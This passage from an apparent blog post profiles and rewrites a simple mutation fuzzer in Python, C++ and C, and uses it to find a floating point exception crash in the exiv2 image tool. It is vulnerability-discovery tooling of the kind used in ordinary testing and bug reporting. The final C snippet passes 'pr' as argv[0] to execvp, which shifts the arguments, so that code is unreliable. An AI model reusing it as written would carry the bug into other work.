     1000    0.028    0.000  100.923    0.101 pty_spawn.py:316(close)
     1000    0.025    0.000  100.816    0.101 ptyprocess.py:387(close)
     1000    0.061    0.000    9.949    0.010 pty_spawn.py:36(__init__)
     1000    0.074    0.000    9.764    0.010 pty_spawn.py:239(_spawn)
     1000    0.041    0.000    8.682    0.009 pty_spawn.py:312(_spawnpty)
     1000    0.266    0.000    8.641    0.009 ptyprocess.py:178(spawn)
     1000    0.011    0.000    7.491    0.007 spawnbase.py:240(expect)
     1000    0.036    0.000    7.479    0.007 spawnbase.py:343(expect_list)
     1000    0.128    0.000    7.409    0.007 expect.py:91(expect_loop)
     6432    6.473    0.001    6.473    0.001 {built-in method posix.read}
     5432    0.089    0.000    3.818    0.001 pty_spawn.py:415(read_nonblocking)
     7348    0.029    0.000    3.162    0.000 utils.py:130(select_ignore_interrupts)
     7348    3.127    0.000    3.127    0.000 {built-in method select.select}
     1000    0.790    0.001    1.777    0.002 blog.py:15(bit_flip)
     1000    0.015    0.000    1.311    0.001 blog.py:134(create_new)
     1000    0.100    0.000    1.101    0.001 pty.py:79(fork)
     1000    1.000    0.001    1.000    0.001 {built-in method posix.forkpty}
-----SNIP-----

For this type of analysis, we don’t really care about how many segfaults we had since we’re not really tinkering much with the mutation methods or comparing different methods. Granted there will be some randomness here, as a crash would necessitate extra processing, but this will do for now.

I snipped only the sections of code where we spent more than 1.0 seconds cumulatively. You can see we spent by far the most time in blog.py:140(exif). A whopping 118 seconds out of 122 seconds total. Our exif() function seems to be a major problem in our performance.

We can see that most of the time we spent underneath that function was directly related to the function, we see plenty of appeals to the pty module from our pexpect usage. Let’s rewrite our function using Popen from the subprocess module and see if we can improve performance here!

Here is our redefined exif() function:

def exif(counter,data):

    p = Popen(["exif", "mutated.jpg", "-verbose"], stdout=PIPE, stderr=PIPE)
    (out,err) = p.communicate()

    if p.returncode == -11:
    	f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
    	f.write(data)
    	print("Segfault!")

    #if counter % 100 == 0:
    #	print(counter, end="\r")

Here is our performance report:

2065580 function calls (2065443 primitive calls) in 2.756 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000    2.756    2.756 {built-in method builtins.exec}
        1    0.038    0.038    2.756    2.756 subpro.py:3(<module>)
     1000    0.020    0.000    1.917    0.002 subpro.py:139(exif)
     1000    0.026    0.000    1.121    0.001 subprocess.py:681(__init__)
     1000    0.099    0.000    1.045    0.001 subprocess.py:1412(_execute_child)
 -----SNIP-----

What a difference. This fuzzer, with the redefined exif() function performed the same amount of work in only 2 seconds!! That’s insane! The old fuzzer: 122 seconds, new fuzzer: 2.7 seconds.

Improving Further in Python

Let’s try to continue improving our fuzzer all within Python. First, let’s get a good benchmark for us to perform against. We’ll get our optimized Python fuzzer to iterate through 50,000 fuzzing iterations and we’ll use the cProfile module again to get some fine-grained statistics about where we spend our time.

102981395 function calls (102981258 primitive calls) in 141.488 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000  141.488  141.488 {built-in method builtins.exec}
        1    1.724    1.724  141.488  141.488 subpro.py:3(<module>)
    50000    0.992    0.000  102.588    0.002 subpro.py:139(exif)
    50000    1.248    0.000   61.562    0.001 subprocess.py:681(__init__)
    50000    5.034    0.000   57.826    0.001 subprocess.py:1412(_execute_child)
    50000    0.437    0.000   39.586    0.001 subprocess.py:920(communicate)
    50000    2.527    0.000   39.064    0.001 subprocess.py:1662(_communicate)
   208254   37.508    0.000   37.508    0.000 {built-in method posix.read}
   158238    0.577    0.000   28.809    0.000 selectors.py:402(select)
   158238   28.131    0.000   28.131    0.000 {method 'poll' of 'select.poll' objects}
    50000   11.784    0.000   25.819    0.001 subpro.py:14(bit_flip)
  7950000    3.666    0.000   10.431    0.000 random.py:256(choice)
    50000    8.421    0.000    8.421    0.000 {built-in method _posixsubprocess.fork_exec}
    50000    0.162    0.000    7.358    0.000 subpro.py:133(create_new)
  7950000    4.096    0.000    6.130    0.000 random.py:224(_randbelow)
   203090    5.016    0.000    5.016    0.000 {built-in method io.open}
    50000    4.211    0.000    4.211    0.000 {method 'close' of '_io.BufferedRandom' objects}
    50000    1.643    0.000    4.194    0.000 os.py:617(get_exec_path)
    50000    1.733    0.000    3.356    0.000 subpro.py:8(get_bytes)
 35866791    2.635    0.000    2.635    0.000 {method 'append' of 'list' objects}
   100000    0.070    0.000    1.960    0.000 subprocess.py:1014(wait)
   100000    0.252    0.000    1.902    0.000 selectors.py:351(register)
   100000    0.444    0.000    1.890    0.000 subprocess.py:1621(_wait)
   100000    0.675    0.000    1.583    0.000 selectors.py:234(register)
   350000    0.432    0.000    1.501    0.000 subprocess.py:1471(<genexpr>)
 12074141    1.434    0.000    1.434    0.000 {method 'getrandbits' of '_random.Random' objects}
    50000    0.059    0.000    1.358    0.000 subprocess.py:1608(_try_wait)
    50000    1.299    0.000    1.299    0.000 {built-in method posix.waitpid}
   100000    0.488    0.000    1.058    0.000 os.py:674(__getitem__)
   100000    1.017    0.000    1.017    0.000 {method 'close' of '_io.BufferedReader' objects}
-----SNIP-----

50,000 iterations took us a grand total of 141 seconds, this is great performance compared to what we were dealing with. We previously took 122 seconds to do 1,000 iterations! Once again filtering on only time where we spent over 1.0 seconds, we see that we again spent most of our time in exif() but we also see some performance issues in bit_flip() as we spent 25 cumulative seconds there. Let’s try to optimize that function a bit.

Let’s go ahead and repost what the old bit_flip() function looked like:

def bit_flip(data):

	num_of_flips = int((len(data) - 4) * .01)

	indexes = range(4, (len(data) - 4))

	chosen_indexes = []

	# iterate selecting indexes until we've hit our num_of_flips number
	counter = 0
	while counter < num_of_flips:
		chosen_indexes.append(random.choice(indexes))
		counter += 1

	for x in chosen_indexes:
		current = data[x]
		current = (bin(current).replace("0b",""))
		current = "0" * (8 - len(current)) + current
		
		indexes = range(0,8)

		picked_index = random.choice(indexes)

		new_number = []

		# our new_number list now has all the digits, example: ['1', '0', '1', '0', '1', '0', '1', '0']
		for i in current:
			new_number.append(i)

		# if the number at our randomly selected index is a 1, make it a 0, and vice versa
		if new_number[picked_index] == "1":
			new_number[picked_index] = "0"
		else:
			new_number[picked_index] = "1"

		# create our new binary string of our bit-flipped number
		current = ''
		for i in new_number:
			current += i

		# convert that string to an integer
		current = int(current,2)

		# change the number in our byte array to our new number we just constructed
		data[x] = current

	return data

This function is admittedly a bit clumsy. We can simplify it greatly by utilizing better logic. I find this is often the case with programming in my limited experience, you can have all of the fancy esoteric programming knowledge you want, but if the logic behind your program is unsound, then the program’s performance will suffer.

Let’s reduce the amount of type conversions we do, for instance ints to str or vice versa, and let’s just get less code into our editor. We can accomplish what we want with a re-defined bit_flip() function as follows:

def bit_flip(data):

	length = len(data) - 4

	num_of_flips = int(length * .01)

	picked_indexes = []
	
	flip_array = [1,2,4,8,16,32,64,128]

	counter = 0
	while counter < num_of_flips:
		picked_indexes.append(random.choice(range(0,length)))
		counter += 1


	for x in picked_indexes:
		mask = random.choice(flip_array)
		data[x] = data[x] ^ mask

	return data

If we employ this new function and monitor the results, we get a performance grade of:

59376275 function calls (59376138 primitive calls) in 135.582 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000  135.582  135.582 {built-in method builtins.exec}
        1    1.940    1.940  135.582  135.582 subpro.py:3(<module>)
    50000    0.978    0.000  107.857    0.002 subpro.py:111(exif)
    50000    1.450    0.000   64.236    0.001 subprocess.py:681(__init__)
    50000    5.566    0.000   60.141    0.001 subprocess.py:1412(_execute_child)
    50000    0.534    0.000   42.259    0.001 subprocess.py:920(communicate)
    50000    2.827    0.000   41.637    0.001 subprocess.py:1662(_communicate)
   199549   38.249    0.000   38.249    0.000 {built-in method posix.read}
   149537    0.555    0.000   30.376    0.000 selectors.py:402(select)
   149537   29.722    0.000   29.722    0.000 {method 'poll' of 'select.poll' objects}
    50000    3.993    0.000   14.471    0.000 subpro.py:14(bit_flip)
  7950000    3.741    0.000   10.316    0.000 random.py:256(choice)
    50000    9.973    0.000    9.973    0.000 {built-in method _posixsubprocess.fork_exec}
    50000    0.163    0.000    7.034    0.000 subpro.py:105(create_new)
  7950000    3.987    0.000    5.952    0.000 random.py:224(_randbelow)
   202567    4.966    0.000    4.966    0.000 {built-in method io.open}
    50000    4.042    0.000    4.042    0.000 {method 'close' of '_io.BufferedRandom' objects}
    50000    1.539    0.000    3.828    0.000 os.py:617(get_exec_path)
    50000    1.843    0.000    3.607    0.000 subpro.py:8(get_bytes)
   100000    0.074    0.000    2.133    0.000 subprocess.py:1014(wait)
   100000    0.463    0.000    2.059    0.000 subprocess.py:1621(_wait)
   100000    0.274    0.000    2.046    0.000 selectors.py:351(register)
   100000    0.782    0.000    1.702    0.000 selectors.py:234(register)
    50000    0.055    0.000    1.507    0.000 subprocess.py:1608(_try_wait)
    50000    1.452    0.000    1.452    0.000 {built-in method posix.waitpid}
   350000    0.424    0.000    1.436    0.000 subprocess.py:1471(<genexpr>)
 12066317    1.339    0.000    1.339    0.000 {method 'getrandbits' of '_random.Random' objects}
   100000    0.466    0.000    1.048    0.000 os.py:674(__getitem__)
   100000    1.014    0.000    1.014    0.000 {method 'close' of '_io.BufferedReader' objects}
-----SNIP-----

As you can see from the metrics, we only spend 14 cumulative seconds in bit_flip() at this point! In our last go-round, we spent 25 seconds here, this is almost twice as fast at this point. We’re doing a good job of optimizing in my opinion here.

Now that we have our ideal Python benchmark (keep in mind there might be opportunities for multi-processing or multi-threading but let’s save this idea for another time), let’s go ahead and port our fuzzer to a new language, C++ and test the performance.

New Fuzzer in C++

To get started, let’s just go ahead and flat out run our newly optimized python fuzzer through 100,000 fuzzing iterations and see how long in total it takes.

118749892 function calls (118749755 primitive calls) in 256.881 seconds

100k iterations in only 256 seconds! That destroys our previous fuzzer.

That will be our benchmark we try to beat in C++. Now, as unfamiliar as I am with the nuances of Python development, multiply that by 10 and you’ll have my unfamiliarity with C++. This code might be laughable to some, but it’s the best I could manage at the present moment and we can explain each function as it relates to our previous Python code.

Let’s go through, function by function, and describe their implementation.

//
// this function simply creates a stream by opening a file in binary mode;
// finds the end of file, creates a string 'data', resizes data to be the same
// size as the file moves the file pointer back to the beginning of the file;
// reads the data from the into the data string;
//
std::string get_bytes(std::string filename)
{
	std::ifstream fin(filename, std::ios::binary);

	if (fin.is_open())
	{
		fin.seekg(0, std::ios::end);
		std::string data;
		data.resize(fin.tellg());
		fin.seekg(0, std::ios::beg);
		fin.read(&data[0], data.size());

		return data;
	}

	else
	{
		std::cout << "Failed to open " << filename << ".\n";
		exit(1);
	}

}

This function, as my comment says, simply retrives a byte string from our target file, which in the case of our testing will still be Canon_40D.jpg.

//
// this will take 1% of the bytes from our valid jpeg and
// flip a random bit in the byte and return the altered string
//
std::string bit_flip(std::string data)
{
	
	int size = (data.length() - 4);
	int num_of_flips = (int)(size * .01);

	// get a vector full of 1% of random byte indexes
	std::vector<int> picked_indexes;
	for (int i = 0; i < num_of_flips; i++)
	{
		int picked_index = rand() % size;
		picked_indexes.push_back(picked_index);
	}

	// iterate through the data string at those indexes and flip a bit
	for (int i = 0; i < picked_indexes.size(); ++i)
	{
		int index = picked_indexes[i];
		char current = data.at(index);
		int decimal = ((int)current & 0xff);
		
		int bit_to_flip = rand() % 8;
		
		decimal ^= 1 << bit_to_flip;
		decimal &= 0xff;
		
		data[index] = (char)decimal;
	}

	return data;

}

This function is a direct equivalent of our bit_flip() function in our Python script.

//
// takes mutated string and creates new jpeg with it;
//
void create_new(std::string mutated)
{
	std::ofstream fout("mutated.jpg", std::ios::binary);

	if (fout.is_open())
	{
		fout.seekp(0, std::ios::beg);
		fout.write(&mutated[0], mutated.size());
	}
	else
	{
		std::cout << "Failed to create mutated.jpg" << ".\n";
		exit(1);
	}

}

This function will simply create a temporary mutated.jpg file, similar to our create_new() function that we had in the Python script.

//
// function to run a system command and store the output as a string;
// https://www.jeremymorgan.com/tutorials/c-programming/how-to-capture-the-output-of-a-linux-command-in-c/
//
std::string get_output(std::string cmd)
{
	std::string output;
	FILE * stream;
	char buffer[256];

	stream = popen(cmd.c_str(), "r");
	if (stream)
	{
		while (!feof(stream))
			if (fgets(buffer, 256, stream) != NULL) output.append(buffer);
				pclose(stream);
	}

	return output;

}

//
// we actually run our exiv2 command via the get_output() func;
// retrieve the output in the form of a string and then we can parse the string;
// we'll save all the outputs that result in a segfault or floating point except;
//
void exif(std::string mutated, int counter)
{
	std::string command = "exif mutated.jpg -verbose 2>&1";

	std::string output = get_output(command);

	std::string segfault = "Segmentation";
	std::string floating_point = "Floating";

	std::size_t pos1 = output.find(segfault);
	std::size_t pos2 = output.find(floating_point);

	if (pos1 != -1)
	{
		std::cout << "Segfault!\n";
		std::ostringstream oss;
		oss << "/root/cppcrashes/crash." << counter << ".jpg";
		std::string filename = oss.str();
		std::ofstream fout(filename, std::ios::binary);

		if (fout.is_open())
			{
				fout.seekp(0, std::ios::beg);
				fout.write(&mutated[0], mutated.size());
			}
		else
		{
			std::cout << "Failed to create " << filename << ".jpg" << ".\n";
			exit(1);
		}
	}
	else if (pos2 != -1)
	{
		std::cout << "Floating Point!\n";
		std::ostringstream oss;
		oss << "/root/cppcrashes/crash." << counter << ".jpg";
		std::string filename = oss.str();
		std::ofstream fout(filename, std::ios::binary);

		if (fout.is_open())
			{
				fout.seekp(0, std::ios::beg);
				fout.write(&mutated[0], mutated.size());
			}
		else
		{
			std::cout << "Failed to create " << filename << ".jpg" << ".\n";
			exit(1);
		}
	}
}

These two functions work together. get_output takes a C++ string as a parameter and will run that command on the operating system and capture the output. The function then returns the output as a string to the calling function exif().

exif() will take the output and look for Segmentation fault or Floating point exception errors and then if found, will write those bytes to a file and save them as a crash.<counter>.jpg file. Very similar to our Python fuzzer.

//
// simply generates a vector of strings that are our 'magic' values;
//
std::vector<std::string> vector_gen()
{
	std::vector<std::string> magic;

	using namespace std::string_literals;

	magic.push_back("\xff");
	magic.push_back("\x7f");
	magic.push_back("\x00"s);
	magic.push_back("\xff\xff");
	magic.push_back("\x7f\xff");
	magic.push_back("\x00\x00"s);
	magic.push_back("\xff\xff\xff\xff");
	magic.push_back("\x80\x00\x00\x00"s);
	magic.push_back("\x40\x00\x00\x00"s);
	magic.push_back("\x7f\xff\xff\xff");

	return magic;
}

//
// randomly picks a magic value from the vector and overwrites that many bytes in the image;
//
std::string magic(std::string data, std::vector<std::string> magic)
{
	
	int vector_size = magic.size();
	int picked_magic_index = rand() % vector_size;
	std::string picked_magic = magic[picked_magic_index];
	int size = (data.length() - 4);
	int picked_data_index = rand() % size;
	data.replace(picked_data_index, magic[picked_magic_index].length(), magic[picked_magic_index]);

	return data;

}

//
// returns 0 or 1;
//
int func_pick()
{
	int result = rand() % 2;

	return result;
}

These functions are pretty similar to our Python implementation as well. vector_gen() pretty much just creates our vector of ‘magic values’ and then subsequent functions like magic() use the vector to randomly pick an index and then overwrite data in the valid jpeg with mutated data accordingly.

func_pick() is very simple and just returns a 0 or a 1 so that our fuzzer can randomly bit_flip() or magic() mutate our valid jpeg. To keep things consistent, let’s have our fuzzer only choose bit_flip() for the time being by adding a temporary line of function = 1 to our program so that we match our Python testing.

Here is our main() function which executes all of our code so far:

int main(int argc, char** argv)
{

	if (argc < 3)
	{
		std::cout << "Usage: ./cppfuzz <valid jpeg> <number_of_fuzzing_iterations>\n";
		std::cout << "Usage: ./cppfuzz Canon_40D.jpg 10000\n";
		return 1;
	}

	// start timer
	auto start = std::chrono::high_resolution_clock::now();

	// initialize our random seed
	srand((unsigned)time(NULL));

	// generate our vector of magic numbers
	std::vector<std::string> magic_vector = vector_gen();

	std::string filename = argv[1];
	int iterations = atoi(argv[2]);

	int counter = 0;
	while (counter < iterations)
	{

		std::string data = get_bytes(filename);

		int function = func_pick();
		function = 1;
		if (function == 0)
		{
			// utilize the magic mutation method; create new jpg; send to exiv2
			std::string mutated = magic(data, magic_vector);
			create_new(mutated);
			exif(mutated,counter);
			counter++;
		}
		else
		{
			// utilize the bit flip mutation; create new jpg; send to exiv2
			std::string mutated = bit_flip(data);
			create_new(mutated);
			exif(mutated,counter);
			counter++;
		}
	}

	// stop timer and print execution time
	auto stop = std::chrono::high_resolution_clock::now();
	auto duration = std::chrono::duration_cast<std::chrono::milliseconds>(stop - start);
	std::cout << "Execution Time: " << duration.count() << "ms\n";

	return 0;
}

We get a valid JPEG to mutate and a number of fuzzing iterations from the command line arguments. We then have some timing mechanisms in place with the std::chrono namespace to time how long our program takes to execute.

We’re kind of cheating here by only selecting bit_flip() type mutations, but that is what we did in Python as well so we want an ‘Apples to Apples’ comparison.

Let’s go ahead and run this for 100,000 iterations and compare it our Python fuzzer benchmark of 256 seconds.

Once we run our C++ fuzzer, we get a printed time spent in milleseconds of: Execution Time: 172638ms or 172 seconds.

So we comfortably destroyed our Python fuzzer with our new C++ fuzzer! This is so exciting. Let’s go ahead and do some math here: 172/256 = 67%. So we’re roughly 33% faster with our C++ implementation. (God I hope you aren’t some 200 IQ math genius reading this and throwing up on your keyboard).

Let’s take our optimized Python and C++ fuzzers and take on a new target!

Selecting a New Victim

Looking at what comes pre-installed on Kali Linux since that’s our operating environment, let’s take a peek at exiv2 which is found in /usr/bin/exiv2.

root@kali:~# exiv2 -h
Usage: exiv2 [ options ] [ action ] file ...

Manipulate the Exif metadata of images.

Actions:
  ad | adjust   Adjust Exif timestamps by the given time. This action
                requires at least one of the -a, -Y, -O or -D options.
  pr | print    Print image metadata.
  rm | delete   Delete image metadata from the files.
  in | insert   Insert metadata from corresponding *.exv files.
                Use option -S to change the suffix of the input files.
  ex | extract  Extract metadata to *.exv, *.xmp and thumbnail image files.
  mv | rename   Rename files and/or set file timestamps according to the
                Exif create timestamp. The filename format can be set with
                -r format, timestamp options are controlled with -t and -T.
  mo | modify   Apply commands to modify (add, set, delete) the Exif and
                IPTC metadata of image files or set the JPEG comment.
                Requires option -c, -m or -M.
  fi | fixiso   Copy ISO setting from the Nikon Makernote to the regular
                Exif tag.
  fc | fixcom   Convert the UNICODE Exif user comment to UCS-2. Its current
                character encoding can be specified with the -n option.

Options:
   -h      Display this help and exit.
   -V      Show the program version and exit.
   -v      Be verbose during the program run.
   -q      Silence warnings and error messages during the program run (quiet).
   -Q lvl  Set log-level to d(ebug), i(nfo), w(arning), e(rror) or m(ute).
   -b      Show large binary values.
   -u      Show unknown tags.
   -g key  Only output info for this key (grep).
   -K key  Only output info for this key (exact match).
   -n enc  Charset to use to decode UNICODE Exif user comments.
   -k      Preserve file timestamps (keep).
   -t      Also set the file timestamp in 'rename' action (overrides -k).
   -T      Only set the file timestamp in 'rename' action, do not rename
           the file (overrides -k).
   -f      Do not prompt before overwriting existing files (force).
   -F      Do not prompt before renaming files (Force).
   -a time Time adjustment in the format [-]HH[:MM[:SS]]. This option
           is only used with the 'adjust' action.
   -Y yrs  Year adjustment with the 'adjust' action.
   -O mon  Month adjustment with the 'adjust' action.
   -D day  Day adjustment with the 'adjust' action.
   -p mode Print mode for the 'print' action. Possible modes are:
             s : print a summary of the Exif metadata (the default)
             a : print Exif, IPTC and XMP metadata (shortcut for -Pkyct)
             t : interpreted (translated) Exif data (-PEkyct)
             v : plain Exif data values (-PExgnycv)
             h : hexdump of the Exif data (-PExgnycsh)
             i : IPTC data values (-PIkyct)
             x : XMP properties (-PXkyct)
             c : JPEG comment
             p : list available previews
             S : print structure of image
             X : extract XMP from image
   -P flgs Print flags for fine control of tag lists ('print' action):
             E : include Exif tags in the list
             I : IPTC datasets
             X : XMP properties
             x : print a column with the tag number
             g : group name
             k : key
             l : tag label
             n : tag name
             y : type
             c : number of components (count)
             s : size in bytes
             v : plain data value
             t : interpreted (translated) data
             h : hexdump of the data
   -d tgt  Delete target(s) for the 'delete' action. Possible targets are:
             a : all supported metadata (the default)
             e : Exif section
             t : Exif thumbnail only
             i : IPTC data
             x : XMP packet
             c : JPEG comment
   -i tgt  Insert target(s) for the 'insert' action. Possible targets are
           the same as those for the -d option, plus a modifier:
             X : Insert metadata from an XMP sidecar file <file>.xmp
           Only JPEG thumbnails can be inserted, they need to be named
           <file>-thumb.jpg
   -e tgt  Extract target(s) for the 'extract' action. Possible targets
           are the same as those for the -d option, plus a target to extract
           preview images and a modifier to generate an XMP sidecar file:
             p[<n>[,<m> ...]] : Extract preview images.
             X : Extract metadata to an XMP sidecar file <file>.xmp
   -r fmt  Filename format for the 'rename' action. The format string
           follows strftime(3). The following keywords are supported:
             :basename:   - original filename without extension
             :dirname:    - name of the directory holding the original file
             :parentname: - name of parent directory
           Default filename format is %Y%m%d_%H%M%S.
   -c txt  JPEG comment string to set in the image.
   -m file Command file for the modify action. The format for commands is
           set|add|del <key> [[<type>] <value>].
   -M cmd  Command line for the modify action. The format for the
           commands is the same as that of the lines of a command file.
   -l dir  Location (directory) for files to be inserted from or extracted to.
   -S .suf Use suffix .suf for source files for insert command.

Looking at the help guidance, let’s just go ahead and randomly take a crack at pr for Print image metadata and also -v for Be verbose during the program run. You can see from this help guidance that there is plenty of attack surface here for us explore but let’s keep things simple for now.

Our command string now in our fuzzers will be something like exiv2 pr -v mutated.jpg.

Let’s go ahead and update our fuzzers and see if we can find some more bugs on a much harder target. It’s worth mentioning that this target is currently supported, and not a trivial binary for us to find bugs on like our last target (an unsupported 7 year old project on Github).

This target has already been fuzzed by much more advanced fuzzers, you can simply google for something like ‘ASan exiv2’ and get plenty of hits of fuzzers creating segfaults in the binary and forwarding the ASan output to the github repository as a bug. This is a significant step up from our last target.

exiv2 on Github

exiv2 Website

Fuzzing Our New Target

Let’s start off with our new and improved Python fuzzer and monitor it’s performance over 50,000 iterations. Let’s add some code that monitors for Floating point exceptions in addition to our Segmentation fault detection (Call it a hunch!). Our new exif() function will look like this:

def exif(counter,data):

    p = Popen(["exiv2", "pr", "-v", "mutated.jpg"], stdout=PIPE, stderr=PIPE)
    (out,err) = p.communicate()

    if p.returncode == -11:
    	f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
    	f.write(data)
    	print("Segfault!")

    elif p.returncode == -8:
    	f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
    	f.write(data)
    	print("Floating Point!")

Looking at the output from python3 -m cProfile -s cumtime subpro.py ~/jpegs/Canon_40D.jpg:

75780446 function calls (75780309 primitive calls) in 213.595 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000  213.595  213.595 {built-in method builtins.exec}
        1    1.481    1.481  213.595  213.595 subpro.py:3(<module>)
    50000    0.818    0.000  187.205    0.004 subpro.py:111(exif)
    50000    0.543    0.000  143.499    0.003 subprocess.py:920(communicate)
    50000    6.773    0.000  142.873    0.003 subprocess.py:1662(_communicate)
  1641352    3.186    0.000  122.668    0.000 selectors.py:402(select)
  1641352  118.799    0.000  118.799    0.000 {method 'poll' of 'select.poll' objects}
    50000    1.220    0.000   42.888    0.001 subprocess.py:681(__init__)
    50000    4.400    0.000   39.364    0.001 subprocess.py:1412(_execute_child)
  1691919   25.759    0.000   25.759    0.000 {built-in method posix.read}
    50000    3.863    0.000   13.938    0.000 subpro.py:14(bit_flip)
  7950000    3.587    0.000    9.991    0.000 random.py:256(choice)
    50000    7.495    0.000    7.495    0.000 {built-in method _posixsubprocess.fork_exec}
    50000    0.148    0.000    7.081    0.000 subpro.py:105(create_new)
  7950000    3.884    0.000    5.764    0.000 random.py:224(_randbelow)
   200000    4.582    0.000    4.582    0.000 {built-in method io.open}
    50000    4.192    0.000    4.192    0.000 {method 'close' of '_io.BufferedRandom' objects}
    50000    1.339    0.000    3.612    0.000 os.py:617(get_exec_path)
    50000    1.641    0.000    3.309    0.000 subpro.py:8(get_bytes)
   100000    0.077    0.000    1.822    0.000 subprocess.py:1014(wait)
   100000    0.432    0.000    1.746    0.000 subprocess.py:1621(_wait)
   100000    0.256    0.000    1.735    0.000 selectors.py:351(register)
   100000    0.619    0.000    1.422    0.000 selectors.py:234(register)
   350000    0.380    0.000    1.402    0.000 subprocess.py:1471(<genexpr>)
 12066004    1.335    0.000    1.335    0.000 {method 'getrandbits' of '_random.Random' objects}
    50000    0.063    0.000    1.222    0.000 subprocess.py:1608(_try_wait)
    50000    1.160    0.000    1.160    0.000 {built-in method posix.waitpid}
   100000    0.519    0.000    1.143    0.000 os.py:674(__getitem__)
  1691352    0.902    0.000    1.097    0.000 selectors.py:66(__len__)
  7234121    1.023    0.000    1.023    0.000 {method 'append' of 'list' objects}
-----SNIP-----

It appears we took 213 seconds total and didn’t really find any bugs, that’s a shame, but could just be luck. Let’s run our C++ fuzzer in the same exact circumstances and monitor the output.

Here we go, we get a similiar time but much improved:

root@kali:~# ./blogcpp ~/jpegs/Canon_40D.jpg 50000
Execution Time: 170829ms

That’s a pretty significant improvement, 43 seconds. That’s 20% off of our Python time. (Again, I apologize to math people.)

Let’s keep our C++ fuzzer running for a bit and see if we find any bugs :).

Bugs on Our New Target!

After maybe 10 seconds of running the fuzzer again, I got this terminal output:

root@kali:~# ./blogcpp ~/jpegs/Canon_40D.jpg 1000000
Floating Point!

It appears we have satisfied requirements for a Floating Point exception. We should have a nice jpg waiting for us in the cppcrashes directory.

root@kali:~/cppcrashes# ls
crash.522.jpg

Let’s confirm the bug by running exiv2 against this sample:

root@kali:~/cppcrashes# exiv2 pr -v crash.522.jpg
File 1/1: crash.522.jpg
Error: Offset of directory Image, entry 0x011b is out of bounds: Offset = 0x080000ae; truncating the entry
Warning: Directory Image, entry 0x8825 has unknown Exif (TIFF) type 68; setting type size 1.
Warning: Directory Image, entry 0x8825 doesn't look like a sub-IFD.
File name       : crash.522.jpg
File size       : 7958 Bytes
MIME type       : image/jpeg
Image size      : 100 x 68
Camera make     : Aanon
Camera model    : Canon EOS 40D
Image timestamp : 2008:05:30 15:56:01
Image number    : 
Exposure time   : 1/160 s
Aperture        : F7.1
Floating point exception

We indeed found a new bug! This is super exciting. We should issue a bug report to the exiv2 developers on Github.

Conclusion

We first optimized our fuzzer in Python and then rewrote it in C++. We gained some massive performance advantages and even found some new bugs on a new harder target.

For some fun, let’s compare our original fuzzer’s performance for 50,000 iterations:

123052109 function calls (123001828 primitive calls) in 6243.939 seconds

As you can see, 6,243 seconds is significantly slower than our C++ fuzzer benchmark of 170 seconds.

Addendum 15/May/2020

Just playing around with porting the C++ fuzzer to C and I made some modest improvements on my own. One of the logic changes I made was to collect the data from the original valid image only once and then copy that data into a newly allocated buffer each fuzzing iteration and then do the mutation operations on the newly allocated buffer. This C version of basically the same C++ fuzzer performed pretty well compared to the C++ fuzzer. Here is a comparison between the two for 200,000 iterations (you can ignore the crash findings as this fuzzer is extremely dumb and 100% random):

h0mbre:~$ time ./cppfuzz Canon_40D.jpg 200000
<snipped_results>

real    10m45.371s
user    7m14.561s
sys     3m10.529s

h0mbre:~$ time ./cfuzz Canon_40D.jpg 200000
<snipped_results>

real    10m7.686s
user    7m27.503s
sys     2m20.843s

So, over 200,000 iterations we end up saving about 35-40 seconds. This was pretty typical in my testing. So just by the few logic changes and using less C++-provided abstractions we saved a lot of sys time. We increased speed by about 5%.

Monitoring Child Process Exit Status

After completing the C translation, I went to Twitter to ask for suggestions about performance improvements. @lcamtuf, the creator of AFL, explained to me that I shouldn’t be using popen() in my code as it spawns a shell and performs abysmally. Here is the code segment I asked for help on:

void exif(int iteration) {
    
    FILE *fileptr;
    
    //fileptr = popen("exif_bin target.jpeg -verbose >/dev/null 2>&1", "r");
    fileptr = popen("exiv2 pr -v mutated.jpeg >/dev/null 2>&1", "r");

    int status = WEXITSTATUS(pclose(fileptr));
    switch(status) {
        case 253:
            break;
        case 0:
            break;
        case 1:
            break;
        default:
            crashes++;
            printf("\r[>] Crashes: %d", crashes);
            fflush(stdout);
            char command[50];
            sprintf(command, "cp mutated.jpeg ccrashes/crash.%d.%d",
             iteration,status);
            system(command);
            break;
    }
}

As you can see, we use popen(), run a shell-command, and then close the file pointer to the child process and return the exit-status for monitoring with the WEXITSTATUS macro. I was filtering out some exit codes that I didn’t care about like 253, 0, and 1, and was hoping to see some related to the floating point errors we already found with our C++ fuzzer or maybe even a segfault. @lcamtuf suggested that instead of popen(), I call fork() to spawn a child process, execvp() to have the child process execute a command, and then finally use waitpid() to await the child process termination and return the exit status.

Since we don’t have a proper shell in this syscall path, I had to also open a handle to /dev/null and call dup2() to route both stdout and stderr there as we don’t care about the command output. I also used the WTERMSIG macro to retrieve the signal that terminated the child process in the event that the WIFSIGNALED macro returned true, which would indicate we got a segfault or floating point exception, etc. So now, our updated function looks like this:

void exif(int iteration) {
    
    char* file = "exiv2";
    char* argv[4];
    argv[0] = "pr";
    argv[1] = "-v";
    argv[2] = "mutated.jpeg";
    argv[3] = NULL;
    pid_t child_pid;
    int child_status;

    child_pid = fork();
    if (child_pid == 0) {
        // this means we're the child process
        int fd = open("/dev/null", O_WRONLY);

        // dup both stdout and stderr and send them to /dev/null
        dup2(fd, 1);
        dup2(fd, 2);
        close(fd);

        execvp(file, argv);
        // shouldn't return, if it does, we have an error with the command
        printf("[!] Unknown command for execvp, exiting...\n");
        exit(1);
    }
    else {
        // this is run by the parent process
        do {
            pid_t tpid = waitpid(child_pid, &child_status, WUNTRACED |
             WCONTINUED);
            if (tpid == -1) {
                printf("[!] Waitpid failed!\n");
                perror("waitpid");
            }
            if (WIFEXITED(child_status)) {
                //printf("WIFEXITED: Exit Status: %d\n", WEXITSTATUS(child_status));
            } else if (WIFSIGNALED(child_status)) {
                crashes++;
                int exit_status = WTERMSIG(child_status);
                printf("\r[>] Crashes: %d", crashes);
                fflush(stdout);
                char command[50];
